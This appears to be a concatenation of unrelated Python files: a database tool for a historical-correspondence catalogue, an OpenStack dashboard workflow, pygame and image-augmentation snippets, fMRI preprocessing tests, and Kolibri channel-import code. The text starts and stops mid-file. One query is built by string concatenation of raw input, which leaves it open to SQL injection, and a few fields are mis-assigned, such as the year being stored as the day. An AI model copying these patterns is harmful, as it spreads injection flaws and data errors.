self.get_int_value(date_of_work2_std_day) date_of_work2_std_month = self.get_int_value(date_of_work2_std_month) date_of_work2_std_year = self.get_int_value(date_of_work2_std_year) date_of_work_std_day = self.get_int_value(date_of_work_std_day) date_of_work_std_month = self.get_int_value(date_of_work_std_month) date_of_work_std_year = self.get_int_value(date_of_work_std_year) date_of_work_approx = self.get_int_value(date_of_work_approx, 0) date_of_work_inferred = self.get_int_value(date_of_work_inferred, 0) date_of_work_std_is_range = self.get_int_value(date_of_work_std_is_range, 0) date_of_work_uncertain = self.get_int_value(date_of_work_uncertain, 0) destination_inferred = self.get_int_value(destination_inferred, 0) destination_uncertain = self.get_int_value(destination_uncertain, 0) origin_inferred = self.get_int_value(origin_inferred, 0) origin_uncertain = self.get_int_value(origin_uncertain, 0) work_is_translation = self.get_int_value(work_is_translation, 0) work_to_be_deleted = self.get_int_value(work_to_be_deleted, 0) date_of_work_std = self.get_date_string(date_of_work_std_year, date_of_work_std_month, date_of_work_std_day ), date_of_work_std_gregorian = date_of_work_std, command = "INSERT INTO cofk_union_work" \ " (" \ "abstract"\ ",accession_code"\ ",addressees_as_marked"\ ",addressees_inferred"\ ",addressees_uncertain"\ ",authors_as_marked"\ ",authors_inferred"\ ",authors_uncertain"\ ",change_user"\ ",creation_user"\ ",date_of_work2_std_day"\ ",date_of_work2_std_month"\ ",date_of_work2_std_year"\ ",date_of_work_approx"\ ",date_of_work_as_marked"\ ",date_of_work_inferred"\ ",date_of_work_std"\ ",date_of_work_std_day"\ ",date_of_work_std_gregorian"\ ",date_of_work_std_is_range"\ ",date_of_work_std_month"\ ",date_of_work_std_year"\ ",date_of_work_uncertain"\ ",description"\ ",destination_as_marked"\ ",destination_inferred"\ ",destination_uncertain"\ ",edit_status"\ ",editors_notes"\ ",explicit"\ ",incipit"\ ",keywords"\ ",language_of_work"\ ",origin_as_marked"\ ",origin_inferred"\ ",origin_uncertain"\ ",original_calendar"\ ",original_catalogue"\ ",ps"\ ",relevant_to_cofk"\ ",work_id"\ ",work_is_translation"\ ",work_to_be_deleted"\ ")" \ " VALUES " \ " (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)" command = self.cursor.mogrify( command, ( abstract, accession_code, addressees_as_marked, addressees_inferred, addressees_uncertain, authors_as_marked, authors_inferred, authors_uncertain, change_user, creation_user, date_of_work2_std_day, date_of_work2_std_month, date_of_work2_std_year, date_of_work_approx, date_of_work_as_marked, date_of_work_inferred, date_of_work_std, date_of_work_std_day, date_of_work_std_gregorian, date_of_work_std_is_range, date_of_work_std_month, date_of_work_std_year, date_of_work_uncertain, description, destination_as_marked, destination_inferred, destination_uncertain, edit_status, editors_notes, explicit, incipit, keywords, language_of_work, origin_as_marked, origin_inferred, origin_uncertain, original_calendar, original_catalogue, ps, relevant_to_cofk, work_id, work_is_translation, work_to_be_deleted ) ) self._print_command( "CREATE work", command ) self._audit_insert( "work" ) self.cursor.execute( command ) return work_id def create_person_or_organisation( self, primary_name, synonyms=None, aliases=None, gender=None, is_org=None, org_type=None, birth_year=None, birth_month=None, birth_day=None, birth_inferred=0, birth_uncertain=0, birth_approx=0, death_year=None, death_month=None, death_day=None, death_inferred=0, death_uncertain=0, death_approx=0, flourished_year_1=None, flourished_year_2=None, flourished_range=0, editors_note='' ): birth_year = self.get_int_value(birth_year) birth_month = self.get_int_value(birth_month) birth_day = self.get_int_value(birth_day) birth_approx = self.get_int_value(birth_approx, 0) birth_inferred = self.get_int_value(birth_inferred, 0) birth_uncertain = self.get_int_value(birth_uncertain, 0) death_year = self.get_int_value(death_year) death_month = self.get_int_value(death_month) death_day = self.get_int_value(death_day) death_approx = self.get_int_value(death_approx, 0) death_inferred = self.get_int_value(death_inferred, 0) death_uncertain = self.get_int_value(death_uncertain, 0) flourished_year_1 = self.get_int_value(flourished_year_1) flourished_year_2 = self.get_int_value(flourished_year_2) flourished_range = self.get_int_value(flourished_range, 0) ## is_org = self.get_int_value(is_org, 0) if is_org == 1 or is_org == '1' or is_org == 'Y' or is_org == 'y' : is_org = 'Y' else : is_org = '' if is_org == 'Y' : org_type = self.get_int_value(org_type) if org_type == '' : org_type = None date_of_birth = None if birth_year or birth_month or birth_day : date_of_birth = self.get_date_string(birth_year, birth_month, birth_day ) date_of_death = None if death_year or death_month or death_day : date_of_death = self.get_date_string(death_year, death_month, death_day ) flourished = None if flourished_year_1 : flourished = self.get_date_string( flourished_year_1 ) elif flourished_year_2 : flourished = self.get_date_string( flourished_year_2 ) if synonyms : synonyms = "; ".join( synonyms.split("\n") ) if aliases : aliases = "; ".join( aliases.split("\n") ) if gender == 'm' or gender == 'M' : gender = 'M' elif gender == 'f' or gender == 'F' : gender = 'F' else : gender = '' self.check_database_connection() # Get next available ID. command = "select nextval('cofk_union_person_iperson_id_seq'::regclass);" self.cursor.execute( command ) iperson_id = self.cursor.fetchone()[0] person_id = "cofk_union_person-iperson_id:000" + str(iperson_id) command = "INSERT INTO cofk_union_person" \ " (" \ "person_id,iperson_id,"\ "foaf_name,skos_altlabel,person_aliases," \ "date_of_birth_year,date_of_birth_month,date_of_birth_day," \ "date_of_birth_inferred,date_of_birth_uncertain,date_of_birth_approx," \ "date_of_birth," \ "date_of_death_year,date_of_death_month,date_of_death_day," \ "date_of_death_inferred,date_of_death_uncertain,date_of_death_approx," \ "date_of_death," \ "gender," \ "is_organisation,organisation_type," \ "flourished_year,flourished2_year,flourished_is_range," \ "flourished," \ "editors_notes," \ "creation_user,change_user" \ " )" \ " VALUES " \ " (" \ "%s,%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s," \ "%s,%s,%s," \ "%s,%s,%s," \ "%s," \ "%s," \ "%s,%s," \ "%s,%s,%s," \ "%s," \ "%s," \ "%s,%s" \ ")" \ " returning person_id" command = self.cursor.mogrify( command, ( person_id, iperson_id, primary_name, synonyms, aliases, birth_year, birth_month, birth_year, birth_inferred, birth_uncertain, birth_approx, date_of_birth, death_year, death_month, death_year, death_inferred, death_uncertain, death_approx, date_of_death, gender, is_org, org_type, flourished_year_1, flourished_year_2, flourished_range, flourished, editors_note, self.user, self.user ) ) self._print_command( "INSERT person", command ) self._audit_insert( "person" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def create_location(self, latitude=None, longitude=None, location_synonyms=None, editors_note=None, element_1_eg_room='', element_2_eg_building='', element_3_eg_parish='', element_4_eg_city='', element_5_eg_county='', element_6_eg_country='', element_7_eg_empire='' ): location_list = [] for value in [element_1_eg_room, element_2_eg_building, element_3_eg_parish, element_4_eg_city, element_5_eg_county, element_6_eg_country, element_7_eg_empire ] : if value is not None and value != '' : location_list.append(value) location_name = ", ".join(location_list) command = "INSERT INTO cofk_union_location" \ " (" \ "location_name," \ "latitude,longitude," \ "location_synonyms," \ "element_1_eg_room,element_2_eg_building," \ "element_3_eg_parish,element_4_eg_city," \ "element_5_eg_county,element_6_eg_country," \ "element_7_eg_empire," \ "editors_notes," \ "creation_user,change_user" \ " )" \ " VALUES " \ " (" \ "%s," \ "%s,%s," \ "%s," \ "%s,%s," \ "%s,%s," \ "%s,%s," \ "%s," \ "%s," \ "%s,%s" \ ")" \ " returning location_id" command = self.cursor.mogrify( command, ( location_name, latitude, longitude, location_synonyms, element_1_eg_room, element_2_eg_building, element_3_eg_parish, element_4_eg_city, element_5_eg_county, element_6_eg_country, element_7_eg_empire, editors_note, self.user, self.user ) ) self._print_command( "INSERT location", command ) self._audit_insert( "location" ) self.cursor.execute( command ) return self.cursor.fetchone()[0] def get_languages_from_code(self, code ): ### print( tweaker.get_languages_from_code( "lat;fra;eng" ) ) ### English, French, Latin ### codes = code.split(";") where = [] for code in codes : where.append( "code_639_3='" + code + "'") command = "SELECT language_name from iso_639_language_codes" \ " where " + " OR ".join( where ) self.cursor.execute( command ) languages = [] for lang in self.cursor: languages.append( lang['language_name'] ) return ", ".join(languages) @staticmethod def get_int_value(value, default=None): if value is not None and value != '' : return int(value) return default @staticmethod def get_date_string(year=None, month=None, day=None) : # Switch to numbers year = int(year) if year is not None else 9999 month = int(month) if month is not None else 12 if day is None : if month in [1, 3, 5, 7, 8, 10, 12] : day = 31 elif month == 2 : day = 28 # should we look for leap years? else : day = 30 year = str(year) if month < 10 : month = "0" + str(month) else : month = str(month) if day < 10 : day = "0" + str(day) else : day = str(day) return year + "-" + month + "-" + day def triggers_enable(self, table_name, triggers=[] ): command = "ALTER TABLE " + table_name + " " triggers_string = [] for trigger in triggers : triggers_string.append( "ENABLE TRIGGER " + trigger ) command += ",".join( triggers_string ) command += ";" command = self.cursor.mogrify( command, ( table_name, ) ) self._print_command( "ENABLE Triggers", command ) self.cursor.execute( command ) def triggers_disable(self, table_name, triggers=[] ): command = "ALTER TABLE " + table_name + " " triggers_string = [] for trigger in triggers : triggers_string.append( "DISABLE TRIGGER " + trigger ) command += ",".join( triggers_string ) command += ";" command = self.cursor.mogrify( command, ( table_name, ) ) self._print_command( "DISABLE Triggers", command ) self.cursor.execute( command ) def calendar_julian_to_calendar_gregorian(self, day, month, year ): # day = 1 to max_length # month = 1 to 12 # year = a number... max_month = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31] if year % 4 == 0: max_month[1] = 29 # Julian calendar change diff_days = 10 if year > 1700 : diff_days = 11 elif year == 1700 and month > 2 : diff_days = 11 elif year == 1700 and month == 2 and day == 29 : diff_days = 11 # get new date new_day = day + diff_days new_month = month new_year = year if new_day > max_month[month-1] : new_day = new_day % max_month[month-1] new_month += 1 if new_month > 12: new_month = 1 new_year += 1 return { "d" : new_day, "m": new_month, "y": new_year } def commit_changes( self, commit=False, quiet=False ): self.check_database_connection() if commit : self.connection.commit() else : self.connection.rollback() self._reset_audit() if not quiet : if commit: print( "Committing...", end="") print( "Done." ) else : print( "NOT commiting... ", end="") print("Rolled back.") def check_database_connection(self): if not self.database_ok() : raise psycopg2.DatabaseError("Database not connected") def database_ok(self): return self.connection and self.cursor def load_schema(self): schema_location = os.path.join(os.path.dirname(__file__), 'schema.json') with open( schema_location ) as f: self.schema = json.load(f) def convert_field_type(self, object_type, field_name, value ): if value is None: return None if self.schema is None: self.load_schema() # types: string number flag timestamp uuid field_type = self.schema["fields"][object_type][field_name] if field_type == "string" or field_type == 'uuid': if isinstance( value, unicode): return value else: return str( value ) elif field_type == "number" : return self.get_int_value( value ) elif field_type == "flag" : if value == "1" or value == "Y" or "value" == "y" or value is True or value == 1: return 1 if value == "0" or value == "N" or value == "y" or value is False or value == 0 : return 0 elif field_type == "timestamp" or field_type == "date": return value # hopefully the database can sort this... return value # Or None, or raise exception? def print_audit(self, going_to_commit=True): print( "Audit:" ) for deleting, number in iter( self.audit["deletions"].items() ) : if going_to_commit : print( "- Deleting " + str( number ) + " " + deleting + "(s)" ) else : print( "- I would have deleted " + str( number ) + " " + deleting + "(s)" ) if len( self.audit["deletions"] ) == 0 : print ( "- Nothing to delete") for inserting, number in iter( self.audit["insertions"].items() ) : if going_to_commit : print( "- Inserting " + str( number ) + " " + inserting + "(s)" ) else : print( "- I would have inserted " + str( number ) + " " + inserting + "(s)" ) if len( self.audit["insertions"] ) == 0 : print ( "- Nothing to insert") for updating, number in iter( self.audit["updates"].items() ) : if going_to_commit : print( "- Updating " + str( number ) + " " + updating + "(s)" ) else : print( "- I would have updated " + str( number ) + " " + updating + "(s)" ) if len( self.audit["updates"] ) == 0 : print ( "- Nothing to update") if not going_to_commit : print( "- Not commiting changes." ) def _audit_update(self, updated): if updated not in self.audit["updates"] : self.audit["updates"][updated] = 1 else : self.audit["updates"][updated] += 1 def _audit_delete(self, deleted): if deleted not in self.audit["deletions"] : self.audit["deletions"][deleted] = 1 else : self.audit["deletions"][deleted] += 1 def _audit_insert(self, inserted): if inserted not in self.audit["insertions"] : self.audit["insertions"][inserted] = 1 else : self.audit["insertions"][inserted] += 1 def _print_command(self, name, command ): if self.debug : print( " *", name + ":", command ) # Copyright (C) 2014 Universidad Politecnica de Madrid # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from horizon import exceptions from horizon import forms from horizon import messages from horizon import workflows from openstack_dashboard.dashboards.idm import utils as idm_utils LOG = logging.getLogger('idm_logger') RELATIONSHIP_SLUG = "update_owners" class RelationshipApiInterface(object): """Holds the api calls for each specific relationship""" def _list_all_owners(self, request, superset_id): pass def _list_all_objects(self, request, superset_id): pass def _list_current_assignments(self, request, superset_id): pass def _get_default_object(self, request): pass def _add_object_to_owner(self, request, superset, owner, obj): pass def _remove_object_from_owner(self, request, superset, owner, obj): pass def _get_supersetid_name(self, request, superset_id): pass class RelationshipConsumerMixin(object): RELATIONSHIP_CLASS = None def _load_relationship_api(self): return self.RELATIONSHIP_CLASS() class UpdateRelationshipAction(workflows.MembershipAction, RelationshipConsumerMixin): ERROR_MESSAGE = ('Unable to retrieve data. Please try again later.') ERROR_URL = '' def __init__(self, request, *args, **kwargs): super(UpdateRelationshipAction, self).__init__(request, *args, **kwargs) self.relationship = self._load_relationship_api() self.superset_id = self._get_superset_id() # Get the default role try: default_object = self.relationship._get_default_object(request) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) if default_object: self._init_default_object_field(default_object) # Get list of available owners try: owners_list = self.relationship._list_all_owners(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) # Get list of objects try: object_list = self.relationship._list_all_objects(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) self._init_object_fields(object_list, owners_list) # Figure out owners & objects try: owners_objects_relationship = \ self.relationship._list_current_assignments(request, self.superset_id) except Exception: exceptions.handle(request, self.ERROR_MESSAGE, redirect=reverse(self.ERROR_URL)) # Flag the alredy owned ones self._init_current_assignments(owners_objects_relationship) def _init_default_object_field(self, default_object): default_object_name = self.get_default_role_field_name() self.fields[default_object_name] = forms.CharField(required=False) self.fields[default_object_name].initial = default_object.id def _init_object_fields(self, object_list, owners_list): relationship = self._load_relationship_api() for obj in object_list: field_name = self.get_member_field_name(obj.id) label = obj.name widget = forms.widgets.SelectMultiple(attrs={ 'data-superset-name': relationship._get_supersetid_name(self.request, self.superset_id), 'data-superset-id':self.superset_id, }) self.fields[field_name] = forms.MultipleChoiceField( required=False, label=label, widget=widget) self.fields[field_name].choices = owners_list self.fields[field_name].initial = [] def _init_current_assignments(self, owners_objects_relationship): for owner_id in owners_objects_relationship: objects_ids = owners_objects_relationship[owner_id] for object_id in objects_ids: field_name = self.get_member_field_name(object_id) if field_name in self.fields: self.fields[field_name].initial.append(owner_id) def _get_superset_id(self): return self.initial['superset_id'] class Meta: slug = RELATIONSHIP_SLUG class UpdateRelationshipStep(workflows.UpdateMembersStep, RelationshipConsumerMixin): action_class = UpdateRelationshipAction contributes = ("superset_id",) server_filter_text = "Use the filter." def contribute(self, data, context): superset_id = context['superset_id'] if data: self.relationship = self._load_relationship_api() try: object_list = self.relationship._list_all_objects( self.workflow.request, superset_id) except Exception: exceptions.handle(self.workflow.request, ('Unable to retrieve list.')) post = self.workflow.request.POST for obj in object_list: field = self.get_member_field_name(obj.id) context[field] = post.getlist(field) return context class RelationshipWorkflow(workflows.Workflow, RelationshipConsumerMixin): default_steps = (UpdateRelationshipStep,) member_slug = RELATIONSHIP_SLUG current_user_editable = True no_roles_message = 'Some users don\'t have any role assigned. If you save now \ they won\'t be authorized in the application' def handle(self, request, data): superset_id = data['superset_id'] member_step = self.get_step(self.member_slug) self.relationship = self._load_relationship_api() try: object_list = self.relationship._list_all_objects( request, superset_id) owners_objects_relationship = \ self.relationship._list_current_assignments(request, superset_id) # re-index by object with a owner list for easier processing # in later steps current_objects = idm_utils.swap_dict(owners_objects_relationship) # Parse the form data modified_objects = {} for obj in object_list: field_name = member_step.get_member_field_name(obj.id) modified_objects[obj.id] = data[field_name] # Create the delete and add sets objects_to_add, objects_to_delete = \ self._create_add_and_delete_sets(modified_objects, current_objects) # Add the objects for object_id in objects_to_add: for owner_id in objects_to_add[object_id]: if (not self.current_user_editable and owner_id == request.user.id): messages.warning( request, 'You can\'t edit your own roles') else: self.relationship._add_object_to_owner( self.request, superset=superset_id, owner=owner_id, obj=object_id) # Remove the objects for object_id in objects_to_delete: for owner_id in objects_to_delete[object_id]: if (not self.current_user_editable and owner_id == request.user.id): messages.warning( request, 'You can\'t edit your own roles') else: self.relationship._remove_object_from_owner( self.request, superset=superset_id, owner=owner_id, obj=object_id) return True except Exception: exceptions.handle(request, ('Failed to modify organization\'s members.')) return False def _create_add_and_delete_sets(self, modified_objects, current_objects): objects_to_add = {} objects_to_delete = {} for object_id in modified_objects: new_owners = set(modified_objects.get(object_id, [])) current_owners = set(current_objects.get(object_id, [])) # owners to add-> owners in N and not in C -> N-C owners_to_add = new_owners - current_owners if owners_to_add: objects_to_add[object_id] = owners_to_add # owners to delete -> owners in C and not in N -> C-N owners_to_delete = current_owners - new_owners if owners_to_delete: objects_to_delete[object_id] = owners_to_delete return objects_to_add, objects_to_delete from PygameHelper import Animation from PygameHelper import load_image, resize_image_ratio, WHITE import pygame pygame.init() WIDTH, HEIGHT = 500, 500 WIN = pygame.display.set_mode((WIDTH, HEIGHT)) pygame.display.set_caption("animation") images = [resize_image_ratio(load_image(f"assets/clock/clock_{i+1}.png"), (64, 64)) for i in range(8)] animation = Animation(WIN, WIDTH//2 - 64//2, HEIGHT//2 - 64//2, images, 5) clock = pygame.time.Clock() FPS = 60 while True: clock.tick(FPS) for event in pygame.event.get(): if event.type == pygame.QUIT or event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE: pygame.quit() quit(-1) WIN.fill(WHITE) animation.animate() animation.draw() pygame.display.update() import cv2 import numpy as np import random class Compose: def __init__(self, augmentations): self.augmentations = augmentations def __call__(self, data): for aug in self.augmentations: data = aug(data) return data class RandomHorizontalFlip: def __init__(self, prob=0.5): self.prob = prob def __call__(self, data): if random.random() < self.prob: # call copy() to avoid negative stride error in torch.from_numpy data = [d[:, ::-1].copy() for d in data] return data class RandomScale: def __init__(self, scale_range=(0.75, 3.0)): self.scale_range = scale_range def __call__(self, data): rand_factor = np.random.normal(1, 0.75) scale = np.min((self.scale_range[1], rand_factor)) scale = np.max((self.scale_range[0], scale)) data = [ cv2.resize(d, None, fx=scale, fy=scale, interpolation=cv2.INTER_LINEAR if d.dtype == np.float32 else cv2.INTER_NEAREST) for d in data] return data class RandomCrop: def __init__(self, crop_size=(200, 200)): self.crop_size = crop_size def __call__(self, data): height, width = data[0].shape[:2] c_h, c_w = self.crop_size assert height >= c_h and width >= c_w, f"({height}, {width}) v.s. ({c_h}, {c_w})" left = random.randint(0, width - c_w) top = random.randint(0, height - c_h) data = [d[top:top+c_h, left:left+c_w] for d in data] return data #!/usr/bin/env python #This is only for backwards compatibility msg = "'import ugali.analysis.isochrone' is deprecated. " msg += "Use 'import ugali.isochrone' instead." DeprecationWarning(msg) from ugali.isochrone import * import numpy as np import nose.tools as nt import numpy.testing as npt import nibabel as nib from .. import preproc def test_prep_timeseries(): prepper = preproc.PrepTimeseries(frames_to_toss=5) data = np.random.randn(60, 60, 33, 100) out_data = prepper.trim_timeseries(data) nt.assert_equal(out_data.shape, (60, 60, 33, 95)) prepper = preproc.PrepTimeseries(frames_to_toss=0) data = np.random.randn(60, 60, 33, 100) out_data = prepper.trim_timeseries(data) nt.assert_equal(out_data.shape, (60, 60, 33, 100)) def test_extract_realignment_target(): extractor = preproc.ExtractRealignmentTarget() for ntp in [20, 21]: index = np.arange(ntp)[None, None, None, :] data = np.ones((45, 45, 30, ntp)) * index img = nib.Nifti1Image(data, np.eye(4)) targ = extractor.extract_target(img) nt.assert_equal(np.asscalar(np.unique(targ)), ntp // 2) def test_robust_normalization(): rs = np.random.RandomState(99) vol_shape = [40, 40, 30] ntp = 100 ts = rs.normal(0, 1, size=vol_shape + [ntp]) mask = rs.uniform(size=vol_shape) > .4 art = preproc.ArtifactDetection() out = art.normalize_timeseries(ts, mask) nt.assert_equal(out.shape, (ntp,)) def test_scale_timeseries(): rs = np.random.RandomState(99) data = rs.randn(10, 10, 10, 20) mask = rs.rand(10, 10, 10) > .25 scaler = preproc.ScaleTimeseries() for target in [20, 40]: for func in [np.mean, np.median]: out = scaler.scale_timeseries(func, data, mask, target) npt.assert_almost_equal(func(out[mask]), target) <reponame>lyw07/kolibri import logging from django.apps import apps from django.db.models.fields.related import ForeignKey from sqlalchemy.exc import OperationalError from sqlalchemy.exc import SQLAlchemyError from sqlalchemy.sql import text from .annotation import update_content_metadata from .channels import read_channel_metadata_from_db_file from .paths import get_content_database_file_path from .sqlalchemybridge import Bridge from .sqlalchemybridge import ClassNotFoundError from kolibri.core.content.apps import KolibriContentConfig from kolibri.core.content.legacy_models import License from kolibri.core.content.models import ChannelMetadata from kolibri.core.content.models import CONTENT_SCHEMA_VERSION from kolibri.core.content.models import ContentNode from kolibri.core.content.models import ContentTag from kolibri.core.content.models import File from kolibri.core.content.models import Language from kolibri.core.content.models import LocalFile from kolibri.core.content.models import NO_VERSION from kolibri.core.content.models import V020BETA1 from kolibri.core.content.models import V040BETA3 from kolibri.core.content.models import VERSION_1 from kolibri.core.content.models import VERSION_2 from kolibri.utils.time_utils import local_now logger = logging.getLogger(__name__) CONTENT_APP_NAME = KolibriContentConfig.label merge_models = [ContentTag, LocalFile, Language] models_not_to_overwrite = [LocalFile] models_to_exclude = [ apps.get_model(CONTENT_APP_NAME, "ChannelMetadata_included_languages") ] class ImportCancelError(Exception): pass def column_not_auto_integer_pk(column): """ A check for whether a column is an auto incrementing integer used for a primary key. """ return not ( column.autoincrement == "auto" and column.primary_key and column.type.python_type is int ) def convert_to_sqlite_value(python_value): if isinstance(python_value, bool): return "1" if python_value else "0" elif python_value is None: return "null" else: return repr(python_value) class ChannelImport(object): """ The ChannelImport class has two functions: 1) it acts as the default import pattern for importing content databases that have naively compatible version with the current version of Kolibri (i.e. no explicit mappings are required to bring data from the content db into the main db, as there is a one to one correspondence in table names and column names within tables). 2) It is also the base class for any more complex import that requires explicit schema mappings from one version to another. """ current_model_being_imported = None _sqlite_db_attached = False # Specific instructions and exceptions for importing table from previous versions of Kolibri # Mappings can be: # 1) 'per_row', specifying mappings for an entire row, string can either be an attribute # or a method name on the import class # 2) 'per_table' mapping an entire table at a time. Only a method name can be used for 'per_table' mappings. # # Both can be used simultaneously. # # See NoVersionChannelImport for an annotated example. schema_mapping = { ContentNode: { "per_row": { "tree_id": "available_tree_id", "available": "default_to_not_available", } }, LocalFile: {"per_row": {"available": "default_to_not_available"}}, File: {"per_row": {"available": "default_to_not_available"}}, } def __init__(self, channel_id, channel_version=None, cancel_check=None): self.channel_id = channel_id self.channel_version = channel_version self.cancel_check = cancel_check self.source_db_path = get_content_database_file_path(self.channel_id) self.source = Bridge(sqlite_file_path=self.source_db_path) # Explicitly set the destination schema version to our latest published schema version # Not the current schema of the DB, as we do our mapping to the published versions. self.destination = Bridge( schema_version=CONTENT_SCHEMA_VERSION, app_name=CONTENT_APP_NAME ) content_app = apps.get_app_config(CONTENT_APP_NAME) # Use this rather than get_models, as it returns a list of all models, including those # generated by ManyToMany fields, whereas get_models only returns explicitly defined # Model classes self.content_models = list(content_app.get_models(include_auto_created=True)) for blacklisted_model in models_to_exclude: if blacklisted_model in self.content_models: self.content_models.remove(blacklisted_model) # Get the next available tree_id in our database self.available_tree_id = self.find_unique_tree_id() self.default_to_not_available = 0 def get_none(self, source_object): return None def get_all_destination_tree_ids(self): ContentNodeRecord = self.destination.get_class(ContentNode) return sorted( map( lambda x: x[0], self.destination.session.query(ContentNodeRecord.tree_id) .distinct() .all(), ) ) def find_unique_tree_id(self): tree_ids = self.get_all_destination_tree_ids() # If there are no pre-existing tree_ids just escape here and return 1 if not tree_ids: return 1 if len(tree_ids) == 1: if tree_ids[0] == 1: return 2 return 1 # Do a binary search to find the lowest unused tree_id def find_hole_in_list(ids): last = len(ids) - 1 middle = int(last / 2 + 1) # Check if the lower half of ids has a hole in it if ids[middle] - ids[0] != middle: # List is only two ids, so hole must be between them if middle == 1: return ids[0] + 1 return find_hole_in_list(ids[:middle]) # Otherwise check if there is a hole in the second half if ids[last] - ids[middle] != last - middle: # Second half is only two ids so hole must be between them if last - middle == 1: return ids[middle] + 1 return find_hole_in_list(ids[middle:]) # We should only reach this point in the first iteration, if there are no holes in either # the first or the last half of the list, therefore, we just take the max of the list plus 1 # Because the list is already sorted, we can just take the last value return ids[-1] + 1 return find_hole_in_list(tree_ids) def generate_row_mapper(self, mappings=None): # If no mappings, just use an empty object if mappings is None: # If no mappings have been specified, we can just skip direct to # the default return value without doing any other checks return self.base_row_mapper def mapper(record, column): """ A mapper function for the mappings object """ if column in mappings: # If the column name is in our defined mappings object, # then we need to try to find an alternate value col_map = mappings.get(column) # Get the string value for the mapping if hasattr(record, col_map): # Is this mapping value another column of the table? # If so, return it straight away return getattr(record, col_map) elif hasattr(self, col_map): # Otherwise, check to see if the import class has an attribute with this name # We assume that if it is, then it is either a literal value or a callable method # that accepts the row data as its only argument, and if so, return the result of # calling that method on the row data mapping = getattr(self, col_map) if callable(mapping): return mapping(record) else: return mapping else: # If neither of these true, we specified a column mapping that is invalid raise AttributeError( "Column mapping specified but no valid column name or method found" ) else: # Otherwise, we can just get the value directly from the record return self.base_row_mapper(record, column) # Return the mapper function for repeated use return mapper def base_table_mapper(self, SourceRecord): # If SourceRecord is none, then the source table does not exist in the DB if SourceRecord: return self.source.session.query(SourceRecord).all() return [] def base_row_mapper(self, record, column): # By default just return value directly from the record return getattr(record, column, None) def generate_table_mapper(self, table_map=None): if table_map is None: # If no table mapping specified, just use the default return self.base_table_mapper # Can only be a method on the Import object if hasattr(self, table_map): # If it is a method of the import class return that method for later use return getattr(self, table_map) # If we got here, there is an invalid table mapping raise AttributeError("Table mapping specified but no valid method found") def raw_attached_sqlite_table_import( self, model, row_mapper, table_mapper, unflushed_rows ): self.check_cancelled() source_table = self.source.get_table(model) dest_table = self.destination.get_table(model) # check the schema map and set up any fields to map to constant values field_constants = {} schema_map = self.schema_mapping.get(model) if schema_map: for field, mapper in schema_map.get("per_row", {}).items(): if hasattr(self, mapper): mapattr = getattr(self, mapper) if callable(mapattr): raise Exception( "Can't use SQLITE table import method with callable column mappers" ) else: field_constants[field] = mapattr else: raise Exception( "Can't use SQLITE table import method with mapping attribute '{}'".format( mapper ) ) # make sure to ignore any auto-incrementing fields so they're regenerated in the destination table fields_to_ignore = set( [ colname for colname, colobj in dest_table.columns.items() if not column_not_auto_integer_pk(colobj) ] ) # enumerate the columns we're going to be writing into, excluding any we're meant to ignore dest_columns = [ col.name for col in dest_table.c if col.name not in fields_to_ignore ] # build a list of values (constants or source table column references) to be inserted source_vals = [] for col in dest_columns: if col in field_constants: # insert the literal constant value, if we have one val = convert_to_sqlite_value(field_constants[col]) elif col in source_table.columns.keys(): # pull the value from the column on the source table if it exists val = "source." + col else: # get the default value from the target model and use that, if the source table didn't have the field val = convert_to_sqlite_value(model._meta.get_field(col).get_default()) source_vals.append(val) if model in models_not_to_overwrite: method = "INSERT OR IGNORE" else: method = "REPLACE" # build and execute a raw SQL query to transfer the data in one fell swoop query = """{method} INTO {table} ({destcols}) SELECT {sourcevals} FROM sourcedb.{table} AS source""".format( method=method, table=dest_table.name, destcols=", ".join(dest_columns), sourcevals=", ".join(source_vals), ) self.destination.session.execute(text(query)) # no need to flush/commit as a result of the transfer in this method return 1 def orm_table_import(self, model, row_mapper, table_mapper, unflushed_rows): DestinationRecord = self.destination.get_class(model) dest_table = self.destination.get_table(model) # If the source class does not exist (i.e. this table is undefined in the source database) # this will raise an error so we set it to None. In this case, a custom table mapper must # have been set up to handle the fact that this is None. try: SourceRecord = self.source.get_class(model) except ClassNotFoundError: SourceRecord = None # Filter out columns that are auto-incrementing integer primary keys, as these can cause collisions in the # database. As all of our content database models use UUID primary keys, the only tables using these # primary keys are intermediary tables for ManyToMany fields, and so nothing should be Foreign Keying # to these ids. # By filtering them here, the database should autoset an incremented id. columns = [ column_name for column_name, column_obj in dest_table.columns.items() if column_not_auto_integer_pk(column_obj) ] data_to_insert = [] merge = model in merge_models do_not_overwrite = model in models_not_to_overwrite for record in table_mapper(SourceRecord): self.check_cancelled() data = { str(column): row_mapper(record, column) for column in columns if row_mapper(record, column) is not None } if merge: self.merge_record( data, model, DestinationRecord, do_not_overwrite=do_not_overwrite ) else: data_to_insert.append(data) unflushed_rows += 1 if unflushed_rows == 10000: if not merge: self.destination.session.bulk_insert_mappings( DestinationRecord, data_to_insert ) data_to_insert = [] self.destination.session.flush() unflushed_rows = 0 if not merge and data_to_insert: self.destination.session.bulk_insert_mappings( DestinationRecord, data_to_insert ) return unflushed_rows def can_use_sqlite_attach_method(self, model, row_mapper, table_mapper): # Check whether we can directly "attach" the sqlite database and do a one-line transfer # First check that we are not doing any mapping to construct the tables can_use_attach = table_mapper == self.base_table_mapper # Now check that the schema mapping doesn't contain anything that we don't know how to handle schema_map = self.schema_mapping.get(model) if schema_map: # Check that the only thing in the schema map is row mappings can_use_attach = ( can_use_attach and len(set(schema_map.keys()) - set(["per_row"])) == 0 ) # Check that all the row mappings defined for this table are 